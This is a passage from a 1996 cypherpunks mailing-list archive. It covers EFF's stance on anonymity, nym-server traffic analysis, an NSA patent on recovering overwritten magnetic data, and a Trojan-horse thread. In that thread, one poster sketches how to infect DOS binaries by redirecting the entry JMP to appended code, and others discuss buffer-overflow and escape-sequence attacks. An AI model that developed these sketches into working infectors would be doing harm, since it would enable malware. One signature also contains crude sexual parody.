Dorothy Denning, different story. I will happily criticize her positions into the ground, because they are what they are. EFF's position does not exist yet, and the only not completely pro-anonymity individual opinions I've seen out of the board are not anti-anonymity, they're just full of questions. I can't slam people for having questions. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From vznuri at netcom.com Tue Sep 3 03:45:43 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Tue, 3 Sep 1996 18:45:43 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: <199609022254.PAA09742@netcom10.netcom.com> ah, the quasi-yearly ranting on EFF has started up. what a great opportunity for drop-down-drag-dead flamewar. Black Unicorn: I resent your holier-than-thou moral posturing over EFF, and am going to attack it as representative of other criticism I have seen of EFF. EFF is an organization that is professional and has worked toward improving cyberspace. it is easy for someone such as yourself to criticize such an organization anonymously, but what is the justification of your criticism? to me someone who has tried and failed, yet is still trying, is better than someone who has never tried. what *constructive* alternative to EFF do you propose? if you have none, please shut up. I am tired of people announcing loudly to the world, "well if EFF doesn't support [insert my personal jihad here], then they're a bunch of losers who don't deserve anyone's money". >Why am I any more mistaken for pointing out that a single influential >member of EFF's staff or board is anti-anonymity and yet remains with the >organization than you are for pointing out that a single influential >member who happened to be anti-anonymity has left? get a clue. an organization does not have to officially espouse what its members espouse. what an organization espouses should be carefully crafted. if all members feel strongly about an issue, yet all also feel that it should not be part of the official plank, then that may be a wise decision to leave it out. what an organization does *not* do is as important as what it does do. EFF is learning, by trial and error and the hard way, to "choose battles wisely". I would love to see more info about EFF's new direction. but one can ask for such clarification without a rabid style such as your own. >In so far as an organization is much defined by those involved, I think it >entirely right to wonder aloud about the personal motives of the staff and >board. I think this PARTICULARLY prudent given EFF's reputation and prior >conduct. blah, blah, blah. why should EFF give the slightest damn what you think of them? if you were at the helm of a competing organization that was doing superior work, or a privacy lobbyist with a track record, maybe they should listen. as it stands I think they are giving you far more respect than you deserve by even responding to your various scurrilous insinuations. why do I see so much of this in cyberspace and on the cpunks list: gripes, gripes, gripes by people who have no record themselves of doing anything constructive...? the difficulty of doing something constructive is proven by the failures, it is not necessarily evidence of incompetence or conspiracies. perhaps you, Unicorn, feel the cpunks have a greater track record than EFF? >I would be most happy to be proven wrong and see EFF suddenly, in a burst >of impressive moral fiber, speak out publically and take some political >action to assure anonymous communication. I would like you to explain why you feel the need to criticize EFF for not necessarily sharing your own agenda. >Well, let's have a clear official position issued then to end all dispute. again, you fail to grasp: EFF may justifiably not want to engage in that fight. it might be a wise decision. who are you to dictate EFF's agenda? why are you picking a fight with someone who might be the best ally? >I'm hardly going to support an organization that proports to be >pro-internet freedom and yet has no official position on anonyminity. perhaps you would be more influential if you learned to spell what you are advocating. (hee, hee) > Of >course you should expect people to wonder about EFF when you have no > official position and yet some staff and board members seem to have a >statist bent. and you, like many other cypherpunks and cyberspace weasels, have a whine-and-shriek-from-the-shadows bent. BTW, I reject the claim by some here (e.g. TCM) that the supposed change in direction at EFF implies that such an organization is inherently top-heavy and will fail in comparison to cypherpunk guerilla-style "technology deployment." it seems to me both the cpunk philosophy and the EFF philosophy can coexist, and I really get tired of people who can't think past a "only one can exist" worldview. I also don't understand the anonymity fight by cpunks. it's the wrong battle imho. ask any remailer operators how their services are panning out. they will complain of the incessant spam and increasing litigious pressure. I don't see any technological solutions to these problems. if there were, they'd have been invented now. let's face it, anonymity is a pain in the ass to support. maybe there are other goals that are more crucial that lie at the heart of anonymity. what cpunks are really seaking is "assurance of freedom from retribution". when the problem is phrased more openly like that, other solutions become possible and worth consideration. anonymity is only one such way to achieve this goal. I for one would like to see more experimentation with reputation systems. "aw gee, nobody knows what one would look like". well, that's the point. From jf_avon at citenet.net Tue Sep 3 03:55:53 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Tue, 3 Sep 1996 18:55:53 +0800 Subject: "Security risks" vs. "credit risks" Message-ID: <9609030808.AB20606@cti02.citenet.net> On 31 Aug 96 at 20:53, Igor Chudov @ home wrote: > Airlines, for example, are under tight and rather > arbitrary control of the FAA. Most CPunks have no idea how true this is. Try reading about the Bob Hoover case if you want to learn about FAA's finest actions... jfa From furballs at netcom.com Tue Sep 3 03:59:29 1996 From: furballs at netcom.com (Paul S. Penrod) Date: Tue, 3 Sep 1996 18:59:29 +0800 Subject: Still more mileage from the old grey mare... was: Trojan Horse In-Reply-To: <199609030151.SAA07328@toad.com> Message-ID: On Mon, 2 Sep 1996, Bill Stewart wrote: > >The key to the success is that the application in question has to be > >compromised to respond to these codes, either by design or by hacking. > >Either way the individual responsible must modify the execution > >mechanism, not just the data itself. > > A well-written program is hard to exploit, but badly written programs > can often be exploited in ways that allow execution of untrusted code. > For instance, the fingerd bug exploited so spectacularly by Robert Morris > handed a program more input that it was ready to accept, and the program > stupidly kept writing the input into the array, past the end, and out > into the stack, where it could be later interpreted as executable code. That is one instance where it was obscure and workable. I am not familiar with the UNIX binary map, but in the Intel DOS world (includes Windows to a large degree), the stack generally lies at the top of DSEG, not CSEG and flows down. Older incarnations of x86 allowed for such wonders as: push ds push cs pop ds [ series of writes ] pop ds and viola, self modifying code by one method. Ugly, but it works. Variations on the same theme exist, now that Intel does not allow direct manipulation of the IP anymore. It's not that difficult to do. Some of the digital audio work I was involved in several years ago required modifying code sequencing on the fly to accomodate time delays and different types of processor performance. Intel binaries are not difficult to modify directly - especially when they are DOS binaries (note the plethora of viruses in the medium). Even good code can be reworked without having source. One of the tricks is to grab the intial JMP off the binary header and point it down past the bottom of the existing binary towards the code you have added. This way on startup DOS does not truncate the new binary size via Function 31h. Now all you have to do is mudge the read section and look for your trigger before executing the additional code. What I have just described is a very simplistic viral mechanism. > > If a popular GIF or JPEG interpreter was written that badly, you could > possibly devise a GIF that lies about how big it is and encourages > the program to scribble on its stack. Now, there probably aren't any > like that, and it'd probably have to be Netscape or MSIE or Lview > to be widespread enough to make an attack like that worthwhile. > (I'd bet on MSIE, of the three of them :-) Does Microsoft have some sort > of Really Cool Extension to JPEG, allowing Macros for Self-Modifying JPEGs, > trying to out-do Netscape's animated GIFs?) > It wouldn't surprise me. > >Let's see -current examples of computing items with this kind of a > >"feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the > >list keeps growing. > > Back when Good Times came out, everyone denied that it was possible > for there to be any risk from a text file (though, as I pointed out, > escape-sequence hacks have been used occasionally for over 15 years), > and not long after that, the MSWord Macro Viruses started appearing. > Bad Code can't always be hacked usefully, but it can always be hacked... > > # Thanks; Bill > # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com > # > # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto > Escape sequence hacking in DOS has been done since the day ANSI.SYS came out to play. IT was a quick and dirty trick to send escape sequence laden files to the unsuspecting and ask them to type them to the screen. Then the fun began. When you stop and think about it though, any application that functions as a data engine of some type is susecptible at some level to this form of attack. The issue is really which method to employ that will give you ROI. ...Paul From tcmay at got.net Tue Sep 3 04:09:31 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 19:09:31 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: At 10:09 PM 9/2/96, Stanton McCandlish wrote: >Also questionably relevant for an issue like this (more relevant perhaps >to intellectual property issues, etc.) The political axis most relevant >here is civil libertarian v. authoritarian. I don't think you'll find >any authoritarians on the EFF board or staff. A civil libertarian would not be speaking about limiting forms of speech to those that are traceable. Anonymous messages are consistent with the First Amendment. Calls for restrictions on anonymity are not consistent with a civil liberties orientation. (As I described in a much longer message earlier today, I can only hope Esther Dyson simply hasn't thought enough about this issue, and about the implications of her calls for "responsible freedom.") --Tim May -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to. [excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996] From MAILER-DAEMON at mqg-smtp3.usmc.mil Tue Sep 3 04:10:19 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Tue, 3 Sep 1996 19:10:19 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: Cypherpunk Mailboxes? Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages. UNDEFINED-----BEGIN PGP SIGNED MESSAGE----- On Mon, 2 Sep 1996, The Deviant wrote: > Hrmm.. perhaps there's a better way... > such as having the user and the mail server negoiae a key (i don't really > know the details of diffie-hellman or he like, so tell me if this isn't > feasable), and have the encryption/decypion routines strip addresses, > so that the person is only identifiable by their key... The mail server still has to send packets to the user. A packet sniffer might not be able to find out the actual contents of the transmission, but it would be able to find out the host that has made the connection. If this is combined with the knowledge of the times that certain user's mailboxes get cleared out, it would be possible to find out which nyms belong to which people. The current nym servers that automatically forward mail do not have this problem. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMituHCzIPc7jvyFpAQFXSQf9FS30slaO7LDllILC+eEdk/7aBAy312MY esRgbc2EUI7W1WBsujrCznLrbzki0MZ58djDxAmIlz2+YzmQFAMpCx1YGaEkTLIt o4//O6KnAkXde1no+WJXuNry3gzXUDgrUG3S8s3HCDsPfmu1x25J/M8nrL9ijx42 Jd2q9Z/wdAZxIFuUUoZotbUDIwXkHk17l+rNVUL5Pt4ukVd2M85wDp6EpWRCWsQP Xjgwp8FdYd8m/tqxjIygyog5tfsV3qD4ve8Wl7E0MaWkqPyvzb843G0VXSKfI0iH fE1WaHmqvF+VwPU/I2BXnjMjWK4xOW/pKk3llQFSEj8frFGjtqn1ag== =3Phf -----END PGP SIGNATURE----- From schneier at counterpane.com Tue Sep 3 04:17:31 1996 From: schneier at counterpane.com (Bruce Schneier) Date: Tue, 3 Sep 1996 19:17:31 +0800 Subject: What the NSA is patenting Message-ID: I just spent a pleasant hour or so searching a patent database for all patents assigned to the NSA. There's some interesting stuff: "Self-locking, tamper-evident package" Method of retrieving documents that concern the same topic" Fifty-Four patents total. (Used to be they just kept stuff secret; now they patent some of it.) Attached is the most interesting thing I found: a patent on techniques for reading data off overwritten magnetic media. Bruce ******************************************************************************** United States Patent Patent Number: 5264794 Date of Patent: 23 Nov 1993 Method of measuring magnetic fields on magnetically recorded media using a scanning tunneling microscope and magnetic probe Inventor(s): Burke, Edward R., Silver Spring, MD, United States Mayergoyz, Isaak D., Rockville, MD, United States Adly, Amr A., Hyattsville, MD, United States Gomez, Romel D., Beltsville, MD, United States Assignee: The United States of America as represented by the Director, National Security Agency, Washington, DC, United States (U.S. government) Appl. No.: 92-947693 Filed: 21 Sep 1992 Int. Cl. ............. G01R033-00; G01R033-12 Issue U.S. Cl. ....... 324/260.000; 324/212.000 Current U.S. Cl. ..... 324/260.000; 324/212.000 Field of Search ...... 324/212; 324/244; 324/260; 324/262 Reference Cited PATENT DOCUMENTS Patent Number Date Class Inventor ---------- --------- -------------- ------------ US 4232265 Apr 1980 324/260.000 Smirnov US 4567439 Jan 1986 324/304.000 McGregor US 4625166 Nov 1986 324/223.000 Steingroever et al. US 4710715 Dec 1987 324/307.000 Mee et al. US 4791368 Dec 1988 324/301.000 Tsuzuki OTHER PUBLICATIONS Magnetic Tip Sees Fine Detail, Lost Data, E. Pennisi, Feb. 29, 1992, Science News, p. 135. Magnetic Field Imaging by Using Magnetic Force Scanning Tunneling Microscopy, Gomez, Burke, Adly, Mayergoyz, Feb. 17, 1992 pp. 906-908 Appl. Phy. Lett. Tunneling-Stabilized Magnetic Force Microscopy of Bit Tracks . . . , Rice, Moreland, IEEE Trans. on Magnetics vol. 27 No. 3 May 1998, pp. 3452-3454. Magnetic Force Scanning Tunneling Microscope Imaging of Overwritten Data, Gomez, Adly, Mayergoyz, Burke, IEEE Journal of Magnetics, Sep. 1992. Analysis of Tunneling Magnetic Force Microscopy Using a Flexible Triangular Probe, Burke, Gomez, Adly, Mayergoyz, IEEE Journal of Magnetics, Sep. 1992. Magnetic Force Microscopy: General Principles and Application to . . . , Rugar, Mamin, et al. Journal of Appl. Phys., Aug. 1, 1990 pp. 1169-1183. Analysis of In-Plane Bit Structure by Magentic Force Microscopy, Wadas, Grutter, Guntherodt, J. Appl Phys. Apr. 1, 1990 pp. 3462-3467. Theoretical Approach to Magnetic Force Microscopy, Wadas, Grutter, American Physical Society, Jun. 1, 1989, 12,013-17. Theory of Magnetic Imaging by Force Microscopy, Saenz, Garcia, Slonczewski, Appl. Phys. Letters, Oct. 10, 1988 pp. 1449-1451. Description of Magnetic Imaging in Atomic Force Microscopy, Wadas, Journal of Magnetism and Magnetic Materials, Aug. 1989 pp. 263-268. Art Unit - 267 Primary Examiner - Snow, Walter E. Attorney, Agent or Firm - Morelli, Robert D.; Maser, Thomas O. --------------------- 8 Claim(s), 4 Drawing Figure(s), 4 Drawing Page(s) ABSTRACT The present invention discloses a method of measuring magnetic fields on magnetically recorded media. The method entails replacing the metal tip typically used with a scanning tunneling microscope with a flexible thin-film nickel of iron magnetic probe. The present invention describes a mathematical equation that relates probe position to magnetic field strength. In order to establish a tunneling current between the magnetic probe and the magnetically recorded media, any protective layer on the magnetically recorded media is removed. The magnetic probe and the magnetically recorded media may be coated with at least three-hundred angstroms of gold in order to reduce spurious probe deflections due to oxide growths on either the magnetic probe or the magnetically recorded media. The scanning tunneling microscope is designed to maintain a constant tunneling current between the probe and the item being scanned. The present invention uses the scanning tunneling microscope to scan the recording tracks of magnetically recorded media. Any change in the magnetic field of the magnetically recorded media will cause a change in the tunneling current. The microscope will change the position of the probe in order to maintain a constant tunneling current. These changes in position are recorded as an image. A mathematical equation that relates probe position to magnetic field strength is then used to extract the magnetic fields of the magnetically recorded media from the recorded image of probe positions. BACKGROUND OF THE INVENTION 1. Field of Invention This invention relates to a method of measuring the magnetic fields of a recorded surface and more particularly to a method of measuring the magnetic fields of magnetically recorded information using a scanning tunneling microscope. 2. Description of Related Art One of the most active areas in magnetic recording technology is the study of processes occurring at the microscopic level. In recent years, several techniques based on scanning tunneling microscopy have been developed to study magnetization patterns in recording media with sub-micron resolution. These include magnetic force microscopy (MFM), and tunneling stabilized (TS) or magnetic force scanning tunneling microscopy (MFSTM). In "Tunneling-stabilized Magnetic Force Microscopy of Bit Tracks on a Hard Disk," a published article by P. Rice and J. Moreland in IEEE Trans. Magn., vol. Mag-27, 1991, pp. 3452-3454 it was shown that magnetic data on a hard disk can be imaged with a tunneling microscope by using a flexible triangular probe cut from a thin film of magnetic material. In U.S. Pat. No. 4,791,368, entitled "Automatic Magnetic Field Measuring Apparatus Using NMR Principles," a method of more accurately measuring magnetic fields is described which entails surrounding the item being measured with a coil, initially measuring the magnetic field, estimating the magnetic resonance frequency of the item being measured, applying a high-frequency voltage of the estimated magnetic resonance frequency, iteratively refining the estimate of the magnetic resonance frequency until the variation in coil inductance is a maximum, and finally, from the resulting magnetic resonance frequency, calculating the magnetic field of the item being measured. In U.S. Pat. No. 4,710,715, entitled "Method Of Mapping Magnetic Field Strength And Tipping Pulse Accuracy Of An NMR Imager," a method of checking the homogeneity of a magnetic field by producing contour lines of equal field strength is disclosed that utilizes a different preparation phase for NMR imaging. The new preparation phase consists of tipping the spins of the volume elements with a 90 degree wait 90 degree RF pulse sequence. In U.S. Pat. No. 4,625,166, entitled "Method For Measuring Magnetic Potentials Using Hall Probes," a method of measuring the hysteresis curve of a magnetic material is disclosed. The steps of the method include subjecting the material to a magnetic field, summing the voltages from a plurality of Hall probes that are spaced in an arc, obtaining the magnetic flux density in the material, and deriving a hysteresis curve of the material from the magnetic flux density and the magnetic field intensity. In U.S. Pat. No. 4,567,439, entitled "Apparatus For Measuring The Magnitude Of A Magnetic Field," a method of measuring the magnitude of a magnetic field is disclosed. The steps of the method include magnetizing the item, inducing an oscillating magnetic field, permitting free precession, inducing signals during free precession, and producing an output that is proportional to the frequency deviation of the induced signals. In U.S. Pat. No. 4,232,265, entitled "Device For Measuring Intensity Of Magnetic Or Electromagnetic Fields Using Strain Gauges Mounted On Ferromagnetic Plates," a device is disclosed that measures magnetic fields by monitoring the electrical signal produced by strain gauges which are connected to overlapping ferromagnetic plates. The magnetic field to be measured causes the gap between the plates to change which in turn causes the electrical output signal from the strain gauges to change. The magnitude of the electrical signal indicates the magnitude of the magnetic field. SUMMARY OF THE INVENTION It is an object of this invention to provide a method of measuring magnetic fields. It is another object of this invention to provide a method of measuring magnetic fields of magnetically recorded information. It is another object of this invention to provide a method of measuring magnetic fields of magnetically recorded information using a scanning tunneling microscope. It is another object of this invention to provide a method of measuring magnetic fields of magnetically recorded information using a scanning tunneling microscope that incorporates a thin-film magnetic probe that is used to relate probe position to magnetic field strength. These objects are achieved by using a magnetic force scanning tunneling microscope to measure magnetic fields. This microscope, which is typically used for recording surface topology of an item, is modified by replacing the fine metallic tip with a flexible magnetic probe. In the typical operation of a scanning tunneling microscope, the fine metallic tip, which is held at a bias potential, is placed in close proximity to the sample surface so that a tunneling current is established between the tip and the sample surface. As the tip scans across the surface, changes in surface topology cause the tunneling current to change. In order to maintain a constant tunneling current, the microscope changes the position of the tip. These changes in tip position are recorded in a two dimensional image that reflects the surface topology of the item scanned. The present invention shows that by replacing the tip with a magnetic probe and by scanning recorded media along the recording tracks, which have no significant topological variations, the scanning tunneling microscope can be used to record the magnetic fields of the recorded media. Just as surface variations caused changes in the tunneling current, changes in magnetic field cause changes in the tunneling current. The microscope will change the position of the probe, as it did with the metallic tip, in order to maintain a constant tunneling current. These position changes are recorded and, with the use of a mathematical equation that relates probe position to magnetic field strength, are used to measure the magnetic fields of the recorded media. BRIEF DESCRIPTION OF THE DRAWINGS FIG. 1 is a perspective view of a typical image created by a scanning tunneling microscope; FIG. 2 is a perspective view of the magnetic probe superimposed upon a graph that indicates the critical dimensions, coordinates, and angles; FIG. 3 is a chart showing the relationship between magnetic probe amplitude and the angle theta; and FIG. 4 is a chart that compares theoretically expected results of probe amplitude versus the angle phi against experimentally obtained data of probe amplitude versus the angle phi. DESCRIPTION OF PREFERRED EMBODIMENTS There is a growing interest in measuring magnetic fields created by magnetization patterns recorded on magnetic media. Since these fields vary over microscopic distances, various microscopic techniques have been developed. The present invention describes a method for measuring magnetic fields on magnetically recorded media by using a modified scanning tunneling microscope. These magnetic fields are measured by determining the relationship between the microscope probe movement and magnetic field strength. The scanning tunneling microscope operates by scanning the surface of an object with a metal tip. The tip is biased with a dc voltage and placed close enough to the surface of the object to establish a tunneling current. Changes in the surface topology of the object cause a change in the tunneling current. A feedback system in the microscope adjusts the vertical position of the tip in order to maintain a constant tunneling current. As the tip is scanned across the object, the changes in tip position are recorded. These recordings reflect the surface topology of the item scanned. An example of such an image is indicated in FIG. 1. The present invention discloses a method for using a modified magnetic force scanning tunneling microscope to measure magnetic fields. The metal tip of the microscope is replaced with a thin-film magnetic probe 20 of FIG. 2. Instead of scanning the surface topology of an item, the modified microscope is used to scan individual recording tracks of a magnetically recorded media which do not have any significant topological variations. Just as was done with the metal tip, the probe 20 is placed in close proximity with the recorded media in order to establish a tunneling current. The probe 20 is then scanned along the recording tracks of the magnetically recorded media. Changes in magnetic field cause a change in the tunneling current. The microscope then changes the position of the probe 20 in order to maintain a constant tunneling current. These position changes are recorded and, with the use of a mathematical equation that relates probe position to magnetic field strength, used to measure the magnetic fields of the recorded media. The energy of interaction between the probe 20 and the magnetic field emanating from the sample surface was evaluated using the geometry as shown in FIG. 2. It was assumed that the field interacts only with the last magnetic domain (i.e., a region that is magnetized in one direction only) at the tip of the probe 20 and that this domain is magnetized uniformly along its length. The magnetization pattern is typically a recorded signal with repetition in the x-direction and infinite extent in the y-direction. Measurements were taken with a scanning tunneling microscope operating in a constant current mode with a maximum scan range in excess of 100 micrometers in each lateral dimension. The tunneling current is typically 0.11 nanoamperes, at a dc bias of 2.7 volts. The scan rate is about 1.5 lines per second. Any protective coatings on the recorded media must be removed. Adverse effects due to surface oxides on the probe 20 or recorded media are reduced by coating the recorded media and the tip of the probe 20 with approximately 300 angstroms of gold. Such a coating is typically deposited by conventional sputtering techniques. The tunneling current changes as the probe 20 interacts with the surface and its magnetic fields. Feedback compensates for this change and the vertical displacement of the probe 20, .DELTA.z, is recorded as a function of its horizontal position. Therefore, a two dimensional image, similar to the image shown in FIG. 1, is formed that maps variations in z as a function of lateral position, i.e., .DELTA.z(x,y). Such an image reflects both the topological and magnetic features of the magnetically recorded media. With the appropriate choice of probe 20 properties, it is possible to extract the magnetic fields from this image. The magnetic contribution to the displacement, .DELTA.z, is determined by the forces acting on the probe 20. Several theoretical calculations that relate recorded images using such a probe 20 with the forces on the probe 20 have appeared in "Analysis of in-plane bit structure by magnetic force microscopy", a published article by A. Wadas, P. Grutter, and H. Guntherodt in J. Appl. Phys., vol. 67, 1990, p. 3462 and "Theory of magnetic imaging by force microscopy," a published article by J. Saenz, N. Garcia, and J. Slonczewski in Appl. Phys. Lett. 53, 1988, p. 1449. However, these calculations have not directly addressed the issue of the dependence of image contrast and resolution on the orientation of the probe 20 as the present invention does. By assuming that the probe 20 is uniformly magnetized along the direction of its length, the vertical displacement can be modeled by considering the interaction of the surface magnetic fields with a magnetic charge distribution at the tip of the probe 20. Flexible magnetic probes 20 made of nickel (Ni) can be used. The probes 20 used in the present invention were fabricated by evaporating approximately 500 nanometers of Ni onto pre-patterned substrates. These films retain the shape of the substrate pattern when peeled away from the pattern. A typical probe would have a thickness (t) of less than or equal to one micrometer, a length (l) of two millimeters, and a width (w) of one micrometer. The angle delta is typically 15 degrees. The angle theta can vary over a range of zero degrees to pi/2 degrees. The angle phi can vary over a range of -pi/2 to pi/2. It has been observed that these probes 20 produce consistent images of magnetization patterns. FIG. 1 also shows the parameters for the equations used in the present invention. It was assumed that the recorded signal is a repetitive pattern of wavelength lambda (.lambda.) in the x direction, with infinite extent in the y direction. In "Theoretical approach to magnetic force microscopy," a published article by A. Wadas and P. Grutter in Phys. Rev. B, vol. 39, no. 16, June 1989, pp. 12013-12017 it was shown that the energy (E) of interaction between the field from the pattern and the last domain on the probe tip can be expressed as E=-.intg.H.multidot.M dV, where H is the magnetic field from the pattern, M is the magnetization of the domain, and V is the volume of the domain. The magnetic field can be expressed as the gradient of a scalar potential capital phi (.PHI.), and, if the magnetization is uniform (.gradient..multidot.M=0 is sufficient), then the above equation for E can be rewritten as E=.intg..gradient..multidot.(.PHI.M) dV. This new equation for E can then be converted to a surface integral using Gauss's theorem to obtain E=.intg..PHI.M.multidot.dA. This latest equation simplifies the calculation of E and the identification of the source of the different terms. The scalar potential will then be of the form ##EQU1## where k=2.pi.n/.lambda. and the coefficients .PHI.n match the series solution to the particular field pattern. Specific values of .PHI.n for various field patterns can be found in "Theoretical approach to magnetic force microscopy," a published article by A. Wadas and P. Grutter in Phys. Rev. B, vol. 39, no. 16, pp 12013-12017, June 1989 and in "Analysis of in-plane bit structure by magnetic force microscopy," a published article by A. Wadas, P. Grutter, ad H. Gutherolt in J. Appl. Phys. 67 (7), pp. 3462-3467, 1990. In the present invention, it was assumed that 1) the domain is magnetized along the probe axis by shape anisotropy, 2) the domain is much longer than .lambda. so that the limit of integration in the z direction can be extended to infinity, and 3) the thickness of the probe, t, is much less than the wavelength .lambda.. In "Magnetic force microscopy: General principles and application to longitudinal recording media," a published article by D. Rugar, H. Mamim, P. Guethner, S. Lambert, J. Stern, I. McFadyen, and T. Yogi in J. Appl. Phys. 68 (3), 1990, pp. 1169-1183, it was shown that the last domain on the probe was 20 micrometers in length. A domain length of this size is typically much longer than the wavelength of patterns on modern recording surfaces. In calculating the energy of interaction (E), the last two equations are used to obtain ##EQU2## The integrals were preformed so that the point (x,z) is the coordinate of the probe tip. The first term in the calculation of the energy of interaction is due to a magnetic charge, Mtw, at the tip of the probe. The magnetic potential is weighted by a sampling factor caused by the variation in the field across the width, w, of the probe tip. The next two terms can be thought of as the contributions from the magnetic charges on the sides of the probe, separated from the tip by the distances x.+-.. The quantity that is measured by the tunneling microscope is the displacement, .DELTA.z, of the probe tip. The displacement is caused by both the surface topology and magnetic field of the recorded media. If the probe tip is properly designed, the magnetic interaction will predominate and the effects due to surface topology will b minimized. If the probe is constrained to rotate in the theta (.theta.) direction, the displacement will be given by lsin.theta..DELTA..theta., where l is the length of the probe's 20 moment-arm. A force, F.sub.N, normal to the probe 20 will cause a rotation in the theta (.theta.) direction such that lF.sub.N =-K.DELTA..theta. where K is the tip torque constant. The displacement .DELTA.z is then given by ##EQU3## The force acting on the tip is the gradient of the energy, F=-.gradient.E, so that .DELTA.z further becomes ##EQU4## Using the last equation and the equation for the energy (E) of interaction, .DELTA.z becomes ##EQU5## These last three equations give a complete description of the interaction between the probe and the recorded pattern. In general, the equations are quite complicated and their usefulness is not readily apparent. In the case where the probe lines up with the pattern (i.e., phi=0), so that the probe scans along the recorded information, the equation for .DELTA.z reduces to a simple form, ##EQU6## The first two terms give the interaction between the magnetic field and the magnetic charge at the tip. The third term gives the effect of the charges on the sides of the probe. The third term was written in the integral form so that it could be expressed in terms of the magnetic field Hz. This last equation can be used to obtain relative values of the magnetic field components Hx and Hz. To obtain absolute values, the probe would have to be calibrated in a known field to obtain the factor (1**2)Mtw/K. An alternative way to obtain the fields from the last equation is by obtaining three images at three different values of the angle theta (.theta.). The fields Hx and Hz can then be obtained at every point from a linear combination of the three images. As an example, if the images were taken at theta equal to 30, 45, and 60 degrees then Hx and Hz would be given by the following two equations: H.sub.x =-18.01z(30.degree.)-13.55z(60.degree.)+29.35z(45.degree.), H.sub.z =-23.48z(30.degree.)-10.40z(60.degree.)+29.35z(45.degree.) where ##EQU7## If phi=0 is chosen as the angle of rotation of the probe, the angle theta must be determined to give the best image sensitivity. For ##EQU8## the relative amplitude of the harmonics, for phi=0, will vary with theta as ##EQU9## The amplitude will have a maximum near theta=pi/2 for both large and small values of a. Raising the elevation of the probe to this value would cause interactions with all the domains in the probe so a smaller value would have to be chosen. The smallest value of theta for which the amplitude is a maximum occurs when a=1, cos(theta)=1/3, and theta=70.5 degrees. This is still a relatively large elevation, but as can be seen from FIG. 3, the maximum occurs over a broad range. Adequate sensitivity can be achieved when theta is as small as 45 degrees. Numerous experiments were performed to verify the equations given above for .DELTA.z, C**2, and beta. Agreement between experimental data and theory, as shown in FIG. 4, is quite good. The theoretical curve was obtained using delta (.delta.)=15 degrees, theta=12 degrees and w=1 micrometer. Error is introduced into the experimental data if, during rotation of the sample, a different recorded track is followed. The method of the present invention shows how the constituent magnetic fields from recorded magnetic patterns can be obtained using a magnetic force scanning tunneling microscope. The sensitivity of the microscope will vary with the orientation of the probe. Changes and modifications in the specifically described embodiments can be carried out without departing from the scope of the invention which is intended to be limited only by the scope of the appended claims. 1. A method of measuring magnetic fields on magnetically recorded media comprising the steps of: (a) replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe in order to relate probe position to magnetic field strength; (b) removing any protective layer from said magnetically recorded media so that said protective layer does not impede the establishment of a tunneling current between said magnetic probe and said magnetically recorded media; (c) aligning said magnetic probe with a recorded track of said magnetically recorded media at an angle of zero degrees; (d) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees in order to establish said tunneling current; (e) scanning said recorded track of said magnetically recorded media with said magnetic probe; (f) recording changes in position of said magnetic probe during said scanning of step (e) due to changes in the magnetic field of said magnetically recorded media; and (g) computing the magnetic fields associated with said recordings of step (f) by using a mathematical equation that relates the position of said magnetic probe to the strength of the magnetic field. 2. The method of claim 1 further comprising the step of plating said magnetic probe and said magnetically recorded media with at least three-hundred angstroms of gold in order to reduce spurious probe deflection due to surface oxides on either said magnetic probe or said magnetically recorded media. 3. The method of claim 1 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film nickel probe. 4. The method of claim 1 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film iron probe. 5. A method of measuring magnetic fields on magnetically recorded media comprising the steps of: (a) replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe in order to relate probe position to magnetic field strength; (b) removing any protective layer from said magnetically recorded media so that said protective layer does not impede the establishment of a tunneling current between said magnetic probe and said magnetically recorded media; (c) aligning said magnetic probe with a recorded track of said magnetically recorded media at an angle of zero degrees; (d) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees in order to establish said tunneling current; (e) scanning said recorded track of said magnetically recorded media with said magnetic probe a first time; (f) recording changes in position of said magnetic probe during said scanning of step (e) due to changes in the magnetic field of said magnetically recorded media; (g) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees but at an angle that is different then the angle used in step (d) in order to establish said tunneling current; (h) scanning said recorded track of said magnetically 